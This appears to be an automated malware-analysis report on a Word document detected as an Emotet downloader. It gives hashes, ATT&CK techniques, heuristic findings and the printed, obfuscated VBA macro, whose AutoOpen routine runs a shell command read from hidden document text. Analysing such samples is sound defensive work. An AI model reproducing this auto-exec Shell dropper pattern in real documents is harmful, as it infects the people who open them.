Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d0a30f503c8a18a5…

MALICIOUS

Office (OLE)

137.1 KB Created: 2018-12-06 07:32:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 914c0f87aef05aa403558d1825c3ef02 SHA-1: 5a6bbe6a47b8329c8f88ee7ebbe2e68f41808e93 SHA-256: d0a30f503c8a18a5d119b95b9544c294cb023d7287419b4fcc64a41e30ea21ba
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic autoopen macro that invokes cmd.exe with execution flags. This is a strong indicator of a downloader attempting to execute a second-stage payload. The ClamAV detection as 'Doc.Downloader.Emotet-6775739-0' further supports this conclusion, suggesting a known downloader family.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6775739-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6775739-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       LiIGsXwzwMLoLuTFf = 218796878 * CInt(267123033) + jWDOAQPqThjOjz + CLng(41008650 + Sgn(iJSwXWIGkwbZwJjt) - 329070738 * 102390805) - pauGbHIjPczEMoJaVOrdM + Chr(zdCoqtJzqQTSQjkD) * 282550668 / CStr(270755129) / (qtintPkmjNiGmUcdR / 25923628 / ROXRmhktXZqSXCNWUSpJYG / Fix(ajMJhzoFTzDXASb + Hex(FIVMMsvGDYzHKbuOLHzhaXD) + 316230007 + CBool(232774596 + XTTiMDsajADtuhoFGJ)))
vrEpMtVt = Array(iFZcsV, mYLtPjr, LRMPsURuv, Interaction.Shell(jiNHJwlH, flNts), YfPiR)
   fBjwpkNfFzWmcw = 76698035 * CInt(238465694) + zqhVAKaFuBkKLwuVBVvhO + CLng(264946156 + Sgn(GKHIkFiRPFNiKiiiqIqujd) - 140939386 * 298928330) - bRbdPCWLAbLtCq + Chr(MkVEwOkqTqEYXtGcpNFIoGoz) * 22024058 / CStr(285392726) / (JDWkoSrizIRvoqaImK / 195373647 / RuwWfwhKFvVAGrbnwFQGjLHU / Fix(SRSOwBoZsFOEAEsljcD + Hex(QowOmLhuXSFndwNfPwHuhb) + 92579365 + CBool(254259494 + jvAXVzjDiHdUDbmU)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
NVRawq
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9248 bytes
SHA-256: 37b21144f1717914ec856c3797f4c0f487f807f86d107f050272f780bda96d48
Detection
ClamAV: No threats found
Obfuscation or payload: likely
215 of 257 identifiers look randomly generated (e.g. 'MkVEwOkqTqEYXtGcpNFIoGoz') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PIZHWATEzlYlA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
NVRawq
End Sub

Attribute VB_Name = "XZpXzRzLj"
Function NVRawq()
On Error Resume Next
   zEiprKwHVPwkAEbcSMTqZdG = 237824839 * CInt(154655325) + KmpjCvooGzIUwViimpoPRLHR + CLng(257106004 + Sgn(lPUVwuStAKSpNDvMzdTwPz) - 53267137 * 311790810) - QwIfwiXtOJZTlwOCCVXLwck + Chr(FOdzoXnHZiiwKNBfuv) * 332866358 / CStr(301295627) / (sMfFwNbkjunLoakBZF / 284827856 / RuGQPsoUsRBdqzMCws / Fix(KLXpjunVnRdUqHXEwFOpEYH + Hex(StJVqOhDhNjKuEWVcWBCOwK) + 149203911 + CBool(127121393 + OwjCnmDfXqkRfYjandaMJti)))
   PZIttFcWMtBZcYa = 188188295 * CInt(335023197) + QWNJtlzcszGfjTrIs + CLng(156627868 + Sgn(DvZnzrVSumqCWO) - 140154038 * 157072262) - sGjWvQNiQjNhiTjCauV + Chr(jNSYTDpBukRLwQQmrjIfMIj) * 71231191 / CStr(52992991) / (LTKAwTzjsioIDraMjjPBl / 120305156 / tLtmqiadHQhrVr / Fix(ozLPYlwidQEzYDvGztQQoCh + Hex(CRBjsVzFVpsSqWu) + 111871901 + CBool(314470781 + QVmiBaLJiwEaGlQCMGkR)))
   GJEfFvMBIDqtmoNCquOfWipT = 206377742 * CInt(55413212) + jZnuJDUhzbQBnIMh + CLng(246274778 + Sgn(VMOnEGVStccTlAwjf) - 186683563 * 139536559) - hpSHNaasaWKwDDJv + Chr(sUjYqJrEjqQFEckMbifuGaij) * 187559383 / CStr(290039688) / (RjPhqAlmHokqjaDhjJ / 260122711 / uajcVdBrSqzwwmZYQJ / Fix(ESpcXrszUCtuXoVdrwn + Hex(NzuUQportAfQajjE) + 27537030 + CBool(326515882 + lddjoZwcHdJibczM)))
   sqjGwhKEwTlvFQCOjGdf = 58181083 * CInt(109414655) + OzWiWwrisaLjrOMMlkhH + CLng(228544669 + Sgn(sPVrKMLPPYbJSJbznGHosUtj) - 67403647 * 287057) - usvaJzTEGNinfTcKnF + Chr(wDklwbAuCXWlhKpQXUzSL) * 335282101 / CStr(29748664) / (mITbVPJGibDTJGzzID / 108549467 / kbzcpCFqqmWzwPznHYYmN / Fix(HFHVGQUzJHiXkKLql + Hex(KTQrFGVtGLskidTUT) + 291490713 + CBool(142902208 + voVtcOPbfocRmGcuzQ)))
   RarUVmVCUoqQblqIFUFLG = 272555764 * CInt(327507232) + YfCzdLNNtsOIuJNqBKwImYZ + CLng(173229161 + Sgn(fmGKSfcczwpkWYIacXiXiNw) - 44961355 * 97577475) - wtoEAGcFwZHDbNlf + Chr(NXGflniKAqDLSqzvIijnuvjI) * 108718026 / CStr(172365536) / (SZwVlCRiiIiKFGuzPYtfj / 56004517 / SiCrARowPLEPkEV / Fix(JAHQmiXdhAwUjWuzK + Hex(driLRRuKPzAqKuuGk) + 205438535 + CBool(184698348 + UoGYJAUUPsREFSaijziqVcP)))
Set zMJJF = PIZHWATEzlYlA.Shapes(dEDPqSU + "uWpaDwCVwiAtCQ" + WVzWOq).TextFrame
   hwjhrnDbtzqtRzKAQk = 23080852 * CInt(225666413) + uXuAaHOjrvMohiqC + CLng(131249919 + Sgn(VnFWuhniOcrocvdGnbohR) - 209168224 * 272783793) - CCdEkRTwwAhuGXcNNvtlsDS + Chr(LauPNmSqzNUrDiuzJ) * 296109569 / CStr(287728002) / (NizPwbUWmEzzjMtJWEkJ / 223495273 / ztDlKiAvbzLqDcbiQmSvDtO / Fix(HqpkaEIiuVlGMNRpVq + Hex(AntIQirowrmnDiidTpQV) + 153598882 + CBool(284247436 + vhrVSDVcaNRNhNiYCiQJ)))
   NTtZsizDImRJODaZAMuCT = 159219844 * CInt(60757510) + JKuEpYztQloWDAJ + CLng(154124394 + Sgn(vqGsVaEaImhfsQpKmQij) - 294327917 * 92295337) - pYtdPDWzDWXXhDNojqdhl + Chr(NYUzMQkaolhGQUbzp) * 151119089 / CStr(249413737) / (dIUsHHYcztOjwZKVJPrFPc / 227629808 / qbmtMmAGvzmEDbsFsHauWA / Fix(rJGnafjWAahCjUi + Hex(NsHlwmGRhXlNHCnQq) + 125855231 + CBool(311837521 + FwaaPcliVZLkNsNBOOJED)))
   pJffcwHvKbUMjriwbXKaPTkR = 40741025 * CInt(250660622) + iaMizcRYdbCKrsNjNwKscJN + CLng(191298475 + Sgn(FhjVYNZqEYVzwVjSTFWZNThC) - 241037806 * 156503078) - vtOZMjfuvhCENcTmUs + Chr(QdaZJDrDllAhlAuiwqwJO) * 113421860 / CStr(176301293) / (lQAIwthNJzHpUUFWVftIuA / 116553206 / TwWvVjWwCmosCi / Fix(rEmXlsEJclcoiXS + Hex(lwwpzWlracInifMTmYCEIcj) + 75131093 + CBool(99227775 + uKtvobksCtGsJVSvzJkRbw)))
   nqkiLEjWzTZiboubsBhLPknm = 64929628 * CInt(172971848) + HsUKiwZwPMtqFciwXAzBP + CLng(55594890 + Sgn(BltohCDwZlXZii) - 60007231 * 286410703) - CsiPzLcijmPmKYRwpTZpH + Chr(tMOUEiDEUOIRzXdoCZQGAQo) * 78454345 / CStr(98042406) / (FbpLjCaJzSBiHufc / 115952929 / dsZtVBQAYBrcYC / Fix(scbOJfGrpYLnYSW + Hex(YzniWmLGoujdZSWuwYO) + 115018362 + CBool(23773024 + IVXBkVJNshCaTdkU)))
jiNHJwlH = zMJJF.ContainingRange + KVNlI + aJcazfo + qcSNu + lMfXbzN + ltiGWGu + SAsszS + OlTGu + obYdvJcv + MlJafjir + OotPMCX + ijrmjSv
   HDSMYzlZwmNvPikUwzSDUt = 146009595 * CInt(164942401) + ikCrsrHrfrXpXdSZIpXNtOz + CLng(46587597 + Sgn(CbaNVNhtTtPjhDuGEkr) - 85569329 * 201463335) - VAdMEwLzQnvQqPjdKdq + Chr(EjCqaldHpiGuvbFakIJihUdc) * 267169876 / CStr(114617968) / (iZbZNWiWmznlSVEK / 249956379 / BUOKGtBTHOjFaBIZwhNE / Fix(XNFTcwXrNdKrvnwzUThYtPT + Hex(jWlctWWwhodGJqdwictlYN) + 208231696 + CBool(92298952 + biOjjwHuSmGKuzrG)))
   ETPndfzzwJPndzZS = 338390402 * CInt(62953677) + TCEPRTufrkUOJjAmkHwGwD + CLng(221503444 + Sgn(uJQsoaFvduSJzEzT) - 229502415 * 3590892) - NdvFDcLpKACnPVt + Chr(ICBqQiYkPQrmjKiXwv) * 135179340 / CStr(218854134) / (DMQdluuaGCnGjpQhJqiEKqmk / 162333301 / AWfpUAMWEqlNiki / Fix(INDjwVNqoEmcoMZf + Hex(cuYuRinuNlavwL) + 328711018 + CBool(176758236 + iZhsMfIoAPOjhrQFICpFPqfQ)))
   scDqdEEijjFmGiGn = 130027884 * CInt(311170984) + HvwbnjuirXhfaRhY + CLng(194176906 + Sgn(FrpEotCnaJZpwGuzSRt) - 2491783 * 106074952) - jWNLwAiVZJdOODXD + Chr(FZAGlIBYaldwPid) * 59717801 / CStr(310930274) / (SrcuCIFjPMksqZP / 68102660 / aPDwNLmYOBWJfAFTuELiKX / Fix(BBtpoivDjFqCtrKEfqVoHiZ + Hex(LfYvUDjiDYCwUWzqSzmEo) + 329523949 + CBool(78501801 + kAfnojkScIdJJzifZMw)))
   HjWdhFtYREwCvopS = 94075995 * CInt(187240468) + oEBwjGNNMwdzUiAz + CLng(336711868 + Sgn(VJhcrEpKLiiSuBO) - 14817014 * 342116013) - FiqWTrjZoHdYupq + Chr(sTcLNzIVvifuEbjS) * 199199109 / CStr(287888600) / (QPwppwRQihnksbhIuZovIaU / 181174524 / MlVMXKtCwZwtdmPwjZoIw / Fix(TWSosqwkqvXEcKvELWthwC + Hex(PRmYzcAfTmaSztiSDGLiA) + 145203577 + CBool(161761711 + FAcOSPQpQlDXGRzI)))
   DfBPJVtijLSmcwobVi = 92310663 * CInt(31707051) + NlbaBwbmTzuSKwcjDZIBbLG + CLng(263410637 + Sgn(QrVirGpoapuZoIYSrPMXURzM) - 307136850 * 113529312) - FDQCinckEFEctEd + Chr(GhGPRkikwuQdzsInZzklK) * 260739396 / CStr(104666240) / (LYTMnmSTqhsfnCrVUjFkXw / 244820254 / wQCvUsZTRUDtQWzJ / Fix(znRzdAXFOQdhfONnGPW + Hex(XwwIZNTwwEwivJaLTNTQf) + 274278835 + CBool(37769440 + vlmGqGJGaaDwpJaPjYH)))
   pEwBKidwwJDDzwRpiUQ = 291650561 * CInt(21240084) + ibzbmUGuhAwijjFMf + CLng(222498106 + Sgn(oKtohSKqXVzVVWXVUCirI) - 287050852 * 27648623) - CEVQkkWpiJPGomSJcij + Chr(kfdIIKkKwqZwGSmdwtF) * 255568839 / CStr(340241198) / (mLHRhikZOdIfrWb / 84709945 / azMsskSAWAoMiZw / Fix(ctRBrdCaWbvoaaPBjlf + Hex(nOtboRLhvNjELHOdKLQzwl) + 144566870 + CBool(110198020 + iZvkncwuJlNzpMZRViJvrc)))
   BCiBYWZMhazKJWYiCP = 307254377 * CInt(215800508) + qImjwMjHwkmjGTz + CLng(58022661 + Sgn(CkmIPbHYpYfzJCooOLtv) - 135800618 * 172339118) - tEiqLiCDbVYMKuwa + Chr(fIJnAJohzsrHDNJcZtEhl) * 315686130 / CStr(299942587) / (VDckqiuQlMQLRWsuuJNmLw / 159339368 / PjkAutvjPWSzhDq / Fix(wbWrwzLCBJmciHbZfU + Hex(GttVrQhwuEvNqStojZ) + 216849070 + CBool(73317420 + YizkGTAIvtRMikaEG)))
Const flNts = 0
   LiIGsXwzwMLoLuTFf = 218796878 * CInt(267123033) + jWDOAQPqThjOjz + CLng(41008650 + Sgn(iJSwXWIGkwbZwJjt) - 329070738 * 102390805) - pauGbHIjPczEMoJaVOrdM + Chr(zdCoqtJzqQTSQjkD) * 282550668 / CStr(270755129) / (qtintPkmjNiGmUcdR / 25923628 / ROXRmhktXZqSXCNWUSpJYG / Fix(ajMJhzoFTzDXASb + Hex(FIVMMsvGDYzHKbuOLHzhaXD) + 316230007 + CBool(232774596 + XTTiMDsajADtuhoFGJ)))
vrEpMtVt = Array(iFZcsV, mYLtPjr, LRMPsURuv, Interaction.Shell(jiNHJwlH, flNts), YfPiR)
   fBjwpkNfFzWmcw = 76698035 * CInt(238465694) + zqhVAKaFuBkKLwuVBVvhO + CLng(264946156 + Sgn(GKHIkFiRPFNiKiiiqIqujd) - 140939386 * 298928330) - bRbdPCWLAbLtCq + Chr(MkVEwOkqTqEYXtGcpNFIoGoz) * 22024058 / CStr(285392726) / (JDWkoSrizIRvoqaImK / 195373647 / RuwWfwhKFvVAGrbnwFQGjLHU / Fix(SRSOwBoZsFOEAEsljcD + Hex(QowOmLhuXSFndwNfPwHuhb) + 92579365 + CBool(254259494 + jvAXVzjDiHdUDbmU)))
   tfsDBzEcGfYwmKzGrwJXRw = 316868193 * CInt(54539351) + lRvhaowaYHzYZOUJXhHlpJGD + CLng(28125111 + Sgn(TZoWujkGQjIvfrbVODzhSk) - 273737182 * 93552483) - QoWIbLsdoUXmBMQnTzoBcCQ + Chr(TuCFWTikadiuNzoV) * 105321363 / CStr(116468473) / (WEjMrhuznBMRNXMojInHVl / 256147469 / YhVZVJTlKLuFjiKY / Fix(UviNMQXBJHMcKVlRXoK + Hex(UddibGCdHEwzPiAp) + 27117047 + CBool(334269556 + QwYMBGIAqJnMtAMI)))
   nRGwMZpZSzDaaMDQLJL = 157731451 * CInt(67110813) + VrKRKkjYlqGtEnqE + CLng(69392943 + Sgn(iiuGwdDuobjLJpPbvOouO) - 33694335 * 277723567) - OMUhHQZGwbpjQOshOPvHpaj + Chr(ddscQPVdnBsmJWmYB) * 188570901 / CStr(82675432) / (zjKjWHjzJiDnjDDiXzqiG / 83349362 / PWGXscXGNNzQtSLGJjWTFzE / Fix(FSIADmdcnrvKPjo + Hex(lbqZjmJMMrjzksmRRB) + 119591149 + CBool(169734640 + XCakUdCWAqavzidHfW)))
   iSDKCXWnWAHcrfLHCKPAiQQ = 254456884 * CInt(147902934) + vWXMCDIoRYjzJzwmS + CLng(160757231 + Sgn(KudiBIpzMMNBQomczQJz) - 21264974 * 130019293) - NmbCASCvwsFLUS + Chr(VENEvbDXQLWUwWIadrrPwa) * 38090216 / CStr(265087608) / (KRPJKcSJLuFkzXbKOKriz / 30907386 / pRcUdDrvwZXlKoNFiEK / Fix(cCqiTQEhPOKjFsZriIpGTw + Hex(LcmQWAFIZnSwnbz) + 7668154 + CBool(83644917 + JfjPnjSOVWaPESdvfChzijKF)))
   aNnduUqnPshztRwMbf = 168062566 * CInt(325046584) + WnqHTNjsKoauGDiFt + CLng(219730026 + Sgn(ufXDbNiRROavcdHEZzVaH) - 65999264 * 304282898) - EGCnOSHiwoCjzk + Chr(upvPikszQwzEIXGck) * 246827402 / CStr(125337840) / (VKqCzHsznbXFpiblLvQULImp / 101101413 / zKrMRwfltjztPWsu / Fix(patOawVRpVwmMYBn + Hex(IhGbJZZDorlSftbRwwOVz) + 165155063 + CBool(97334049 + ubchzhLwGiOLoifAUL)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.